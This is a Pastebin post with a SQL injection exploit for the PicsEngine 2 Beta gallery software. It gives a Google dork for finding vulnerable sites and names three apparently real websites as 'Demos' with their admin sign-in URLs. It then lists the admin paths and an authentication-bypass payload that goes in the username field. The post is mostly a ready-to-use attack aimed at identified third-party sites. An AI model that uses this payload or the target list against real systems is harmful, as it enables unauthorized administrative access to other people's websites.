Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################################################
- # Exploit Title: PicsEngine 2 Beta - SQL Injection Authentication Bypass Vulnerability
- # Google Dork: intitle:"Powered By PicsEngine 2 Beta"
- # Date: 28-1-2016
- # Twitter :D : https://twitter.com/Blast3r_ma
- # Exploit Author: Blast3r_ma
- # Software Link: http://www.commentcamarche.net/download/telecharger-34086165-picsengine
- # Software Link: http://telecharger.logiciel.net/picsengine/
- # Tested on: Windows , Linux
- # Version: 2 Beta
- ################################################
- =========Demos:=================
- http://www.ethnomusika.org/public/gallery/admin/signin.php?ref=/public/gallery/admin/
- http://www.sylval.com/galerie/admin/signin.php?ref=/galerie/admin/
- http://chomette-architectes.com/galerie/admin/signin.php?ref=/galerie/admin/
- .......
- ====================================
- Path:
- ==================
- http://<target>/gallery/admin
- or
- http://<target>/admin
- ==============
- POC-Exploit:
- ============
- *Username: ADmin' OR 1=1 -- -
- *Password: lksjfksjflsdkfj
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement